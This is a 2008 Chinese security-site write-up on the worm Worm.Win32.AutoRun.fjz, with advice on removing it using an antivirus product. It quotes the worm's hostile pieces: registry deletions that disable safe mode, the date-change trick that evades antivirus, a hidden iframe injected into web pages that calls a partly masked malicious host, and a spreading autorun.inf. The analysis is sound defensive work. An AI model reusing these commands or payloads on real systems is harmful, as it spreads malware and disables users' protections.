科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网安全频道svchost.exe病毒,Worm.Win32.AutoRun.fjz

svchost.exe病毒,Worm.Win32.AutoRun.fjz

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

Worm.Win32.AutoRun.fjz病毒被执行后拷贝自身到C:\Documents and Settings\All Users\「开始」菜单\程序\启动目录下重新命名为“svchost.exe”并执行;后使用批处理执行自删除。查询当前进程中是否存在“AVP.EXE”或含有“卡巴”字样的窗口,如存在则使用执行命令行“cmd.exe /c date 1989-12-01 ”修改系统时间,试图使其监控失效;

来源:论坛整理 2008年12月6日

关键字: 病毒资料 病毒查杀 安全防范

  • 评论
  • 分享微博
  • 分享邮件

Worm.Win32.AutoRun.fjz病毒被执行后拷贝自身到C:\Documents and Settings\All Users\「开始」菜单\程序\启动目录下重新命名为“svchost.exe”并执行;后使用批处理执行自删除。查询当前进程中是否存在“AVP.EXE”或含有“卡巴”字样的窗口,如存在则使用执行命令行“cmd.exe /c date 1989-12-01 ”修改系统时间,试图使其监控失效;

被拷贝程序程序执行后,后台调用命令行删除安全模式相关注册表:

  Quote:
cmd /c reg delete
hkey_local_machine\system\currentcontrolset\control\safeboot\minimla /f
cmd /c reg delete
hkey_local_machine\system\currentcontrolset\control\safeboot\network /f
查找窗口名或类名为如下字符的窗口,通过向其发送相关消息使其关闭退出:
  Quote:
瑞星
金山
江民
诺顿
遍历磁盘文件删除扩展名为“gho”的文件,使用户不能通过“ghost”恢复系统;查找磁盘中文件扩展名为“htm”,“html”,“asp”,“aspx”,“php”,“jsp”的文件,打开文件将以下代码写入,感染网页文件进行传播。
  Quote:
<iframe src=http://sy***01.199.53dns.com/mz/005.htm width=0 ",CR,LF,"height=0></iframe>
访问恶意网址“http://sy***01.199.53dns.com/mz/”读取下载列表“mm.txt”,根据列表下载病毒至%SystemRoot%\temp\目录下并执行下载的病毒。
枚举盘符在各分区和移动存储介质中释放隐藏文件“autorun.inf”以及病毒副本“svchost.exe” ,使用Windows自动播放功能来传播病毒。
其中autorun.inf文件内容如下:
  Quote:
[AutoRun]
open=svchost.exe
shell\open\command=svchost.exe
shell\open\default=1
shell\explore=资源管理器(&x)
shell\explore\command=svchost.exe
微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”,请直接选择删除处理(如图1);



  如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"Worm.Win32.AutoRun.fjz”,请直接选择删除(如图2)。

推荐安装正版的  微点主动防御软件 进行全面监控,防范svchost.exe病毒,Worm.Win32.AutoRun.fjz

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章